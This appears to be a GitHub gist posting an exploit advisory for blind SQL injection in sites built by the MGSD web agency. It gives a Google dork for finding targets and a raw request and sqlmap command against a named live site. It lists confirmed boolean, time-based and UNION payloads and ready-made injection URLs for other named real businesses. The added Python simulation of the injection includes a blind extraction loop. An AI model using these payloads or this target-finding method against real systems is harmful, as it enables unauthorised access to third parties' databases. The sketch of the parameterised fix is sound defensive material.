@JayChousfan
Last active April 15, 2024 17:37
*********************************************************
#Exploit Title: Conception & Réalisation MGSD - Blind SQL Injection Vulnerability
#Date: 2023-09-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "Conception & Réalisation MGSD"
#Category: webapps
#Tested On: Mac, Firefox
[+] Google dork used to find affected sites: "Conception & Réalisation MGSD" (French for "Design & Development MGSD"). Every site found this way that exposes a `*.php?id=` detail page is a candidate; the injection is in the `id` parameter.
![image-20240416004338784](https://gist.github.com/assets/87851908/873d9e97-f422-4642-aef0-3c3bf42cca0b)
Example 1:
Save the raw request below as 1.txt. The `id` value is left empty; sqlmap supplies the payloads. (The `Accept` header had lost its `*/*` entry in transit and is restored here.)
```http
GET /under_products_marechal.php?id= HTTP/1.1
Host: www.lakelec.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
```
Then run sqlmap against that file, restricting it to the `id` parameter. `--risk 3` is what enables the OR-based boolean tests that found the first injection (those payloads can modify data if the same input reaches an UPDATE or DELETE, so do not use them blindly), and `--level 3` widens the set of payload boundaries tried:
```
sqlmap -r 1.txt -p "id" --batch --level 3 --risk 3 --random-agent
```
Payload (sqlmap output, the three injection types it confirmed):
```
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-5908' OR 5413=5413-- CZqv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=' AND (SELECT 2816 FROM (SELECT(SLEEP(5)))PMke)-- TztO

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL-- -
```
Reading the payloads: the leading `'` closes the quoted `id` value and `-- ` comments out the remainder of the original statement, so the sink is a string literal in a `WHERE id='...'` clause built by concatenation. The `SLEEP(5)` payload fixes the backend as MySQL. The UNION finding shows the vulnerable SELECT has five columns and that column 4 is echoed in the page: the hex literals are sqlmap's delimiters (0x71767a7671 = `qvzvq`, 0x716a626b71 = `qjbkq`) around a random token, and seeing `qvzvq...qjbkq` in the response proves direct data retrieval is possible, so nothing has to be extracted blind on this host.
![QQ image 20240416012201](https://gist.github.com/assets/87851908/ac40523d-6be1-4e94-a1d4-42484f8dd281)
Example 2: the same payloads work unchanged on other sites built by the same agency (URLs as reported, URL-encoded; the first two are the UNION marker payload with the reflected column in position 4 and position 3 respectively, the third places a boolean expression in the reflected UNION column so the page shows 0 or 1, and the fourth is a plain true/false probe on whether `@@version` starts with `5`):
https://www.cmcelqods-dz.com/notre-expertise-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL--%20-
https://www.cmcelqods-dz.com/injectables-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL,NULL--%20-
https://www.cmcelqods-dz.com/nos-praticiens-detail.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,substring(@@version,1,1)=1,NULL,NULL--%20-
https://www.tiziriceramica.com/en/actualites-detail.php?id=2%27%20and%20substring(@@version,1,1)=5--+&titre=Salon%20international%20des%20promoteurs%20immobiliers%20et%20maisons%20intelligentes%20E-LOGIA%20Oran
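The following is an added example and is not code from the advisory or from the MGSD sites. It simulates the vulnerable `?id=` handler (a query built by string concatenation over an in-memory SQLite table with a made-up schema), runs the advisory's OR-tautology and UNION payloads against it, and generalises the single `substring(@@version,1,1)=5` probe above into a boolean-based blind extraction loop that recovers a whole string with a handful of yes/no requests per character. MySQL-specific pieces have SQLite stand-ins: `sqlite_version()` for `@@version`, `||` for `CONCAT()`, `unicode()` for `ORD()`. The parameterised `lookup_safe` is the fix (in PHP the equivalent is a `PDO::prepare` call with the value bound, never interpolated).

```python
# Added example (not the vendor's or the advisory's code): a simulated vulnerable
# ".php?id=" lookup backed by in-memory SQLite, the payload classes sqlmap
# reported, and a boolean-based blind extraction loop. sqlite_version() stands in
# for MySQL's @@version and '||' for CONCAT(); table and column names are made up.
import sqlite3

COLUMNS = "id, name, descr, price, img"   # 5 columns, matching the "5 columns" UNION finding


def make_db():
    """Constructed sample data; the real sites' schema is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(id INTEGER, name TEXT, descr TEXT, price TEXT, img TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?, ?)",
        [(1, "Socket A", "16A socket", "12.50", "a.png"),
         (2, "Socket B", "32A socket", "19.90", "b.png")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the query by string concatenation, the shape the quote-then-comment
    payloads require. Errors are swallowed so the only signal is rows / no rows:
    a blind sink (assumption about the targets; sqlmap's findings fit it)."""
    sql = "SELECT " + COLUMNS + " FROM products WHERE id='" + user_id + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []


def lookup_safe(conn, user_id):
    """The fix: bind the value as a parameter, never splice it into SQL text."""
    return conn.execute("SELECT " + COLUMNS + " FROM products WHERE id=?", (user_id,)).fetchall()


def union_marker(conn, lookup=lookup_vulnerable):
    """The advisory's UNION payload with sqlmap's hex CONCAT() markers rewritten as
    SQLite string literals; returns column 4 of the first row, or None."""
    payload = "' UNION ALL SELECT NULL,NULL,NULL,'qvzvq'||'PAYLOAD'||'qjbkq',NULL-- -"
    rows = lookup(conn, payload)
    return rows[0][3] if rows else None


def oracle(conn, condition, lookup=lookup_vulnerable):
    """Boolean oracle: True iff the injected condition left the page with rows."""
    return len(lookup(conn, "1' AND (" + condition + ")-- ")) > 0


def extract_blind(conn, expr, max_len=32, lookup=lookup_vulnerable):
    """Recover the string value of SQL expression `expr` one character at a time,
    binary-searching the code point with 7 yes/no queries per character. This is
    the general form of the single probe substring(@@version,1,1)=5 in Example 2."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length({expr}) >= {pos}", lookup):
            break                      # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({expr}, {pos}, 1)) > {mid}", lookup):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def true_value(conn, expr):
    """Ground truth for checking the inference: a trusted, non-injected query
    (expr is a literal chosen by the caller here, not user input)."""
    return conn.execute("SELECT " + expr).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("OR tautology rows:", len(lookup_vulnerable(db, "-5908' OR 5413=5413-- CZqv")))
    print("UNION marker:", union_marker(db))
    print("blind:", extract_blind(db, "sqlite_version()"), "==", true_value(db, "sqlite_version()"))
    print("same payloads against the parameterised lookup:",
          len(lookup_safe(db, "-5908' OR 5413=5413-- CZqv")), union_marker(db, lookup_safe))
```

The loop is exactly what sqlmap does under `boolean-based blind`, minus its optimisations; against the parameterised lookup every probe returns no rows, so the extractor returns an empty string and the UNION marker never appears.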
reference: https://cxsecurity.com/issue/WLB-2023090062